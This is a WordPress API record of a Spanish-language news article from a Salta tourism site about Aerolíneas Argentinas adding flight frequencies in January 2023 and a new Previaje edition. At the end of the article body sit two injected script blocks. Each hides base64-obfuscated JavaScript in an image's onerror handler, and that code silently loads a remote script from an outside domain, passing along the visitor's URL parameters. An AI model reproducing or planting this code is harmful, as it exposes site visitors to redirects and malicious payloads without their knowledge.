{"id":1887,"date":"2022-12-05T10:43:53","date_gmt":"2022-12-05T13:43:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1887"},"modified":"2025-08-14T00:28:53","modified_gmt":"2025-08-14T03:28:53","slug":"aerolineas-argentinas-incrementara-en-enero-de-2023-las-frecuencias-a-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1887","title":{"rendered":"Aerol\u00edneas Argentinas incrementar\u00e1 en enero de 2023 las frecuencias a Salta"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#8d0728\"><em>En asamblea del Consejo Federal de Turismo tambi\u00e9n se confirm\u00f3 el Previaje IV el a\u00f1o pr\u00f3ximo. Adem\u00e1s, el Norte argentino present\u00f3 su oferta tur\u00edstica para el verano 2023.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes<strong>&nbsp;Mario Pe\u00f1a<\/strong>&nbsp;particip\u00f3 en la \u00faltima reuni\u00f3n del a\u00f1o del Consejo Federal de Turismo, encuentro que cont\u00f3 con la presencia del ministro de la cartera nacional, Mat\u00edas Lammens y se desarroll\u00f3 en la ciudad de Bariloche.<\/p>\n\n\n\n<p>El funcionario salte\u00f1o anunci\u00f3 que a partir de enero de 2023 Salta sumar\u00e1 10 frecuencias m\u00e1s desde Buenos Aires, Mendoza e Iguaz\u00fa a trav\u00e9s de Aerol\u00edneas Argentinas en virtud del incremento de la demanda a la provincia en este sentido, Pe\u00f1a agradeci\u00f3 a la compa\u00f1\u00eda a trav\u00e9s de su presidente&nbsp;<strong>Pablo Ceriani<\/strong>&nbsp;\u201cpor confiar en Salta una vez m\u00e1s\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5095-aerolineas-argentinas-incrementara-en-enero-de-2023-las-frecuencias-a-salta.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5095-aerolineas-argentinas-incrementara-en-enero-de-2023-las-frecuencias-a-salta.jpg\" alt=\"Aerol\u00edneas Argentinas incrementar\u00e1 en enero de 2023 las frecuencias a Salta\"\/><\/a><\/figure>\n\n\n\n<p>Este a\u00f1o hacia la provincia se pusieron operativas rutas in\u00e9ditas y estrat\u00e9gicas como son Bariloche, Resistencia y San Pablo, Brasil, totalizando conexiones con 9 destinos nacionales y con la principal econom\u00eda de Latinoam\u00e9rica.<\/p>\n\n\n\n<p>En el marco de la asamblea del CFT, las provincias del Norte argentino a trav\u00e9s del Ente que las representa, present\u00f3 la oferta tur\u00edstica de la regi\u00f3n para el verano 2023 invitando a recorrer los seis destinos: Salta, Jujuy, Tucum\u00e1n, Santiago del Estero, Catamarca y La Rioja.<\/p>\n\n\n\n<p>Con un video promocional, los ministros provinciales presentaron a la prensa especializada los mejores paisajes y productos tur\u00edsticos. Tambi\u00e9n avanzaron en un trabajo conjunto para posicionar el Norte argentino principalmente en mercados internacionales.<\/p>\n\n\n\n<p>Finalmente, el Ministerio de Turismo y Deportes de la Naci\u00f3n confirm\u00f3 una nueva edici\u00f3n del Previaje, ser\u00e1 la cuarta y se implementar\u00e1 el a\u00f1o pr\u00f3ximo, destacando este programa para romper la estacionalidad tur\u00edstica.<\/p>\n\n\n\n<p>Tambi\u00e9n participaron la secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, el presidente del CFT,&nbsp;<strong>Sebasti\u00e1n Giobelina<\/strong>&nbsp;y representantes de todos los destinos tur\u00edsticos.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5096-aerolineas-argentinas-incrementara-en-enero-de-2023-las-frecuencias-a-salta.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5096-aerolineas-argentinas-incrementara-en-enero-de-2023-las-frecuencias-a-salta.jpg\" alt=\"Aerol\u00edneas Argentinas incrementar\u00e1 en enero de 2023 las frecuencias a Salta\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/aerolineas-argentinas-incrementara-en-enero-de-2023-las-frecuencias-a-salta-86579\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En asamblea del Consejo Federal de Turismo tambi\u00e9n se confirm\u00f3 el Previaje IV el a\u00f1o pr\u00f3ximo. Adem\u00e1s, el Norte argentino present\u00f3 su oferta tur\u00edstica para el verano 2023. El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;particip\u00f3 en la \u00faltima reuni\u00f3n del a\u00f1o del Consejo Federal de Turismo, encuentro que cont\u00f3 con la presencia del ministro de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1888,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1887","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1887"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1887"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1887\/revisions"}],"predecessor-version":[{"id":7256,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1887\/revisions\/7256"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1888"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1887"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1887"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1887"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}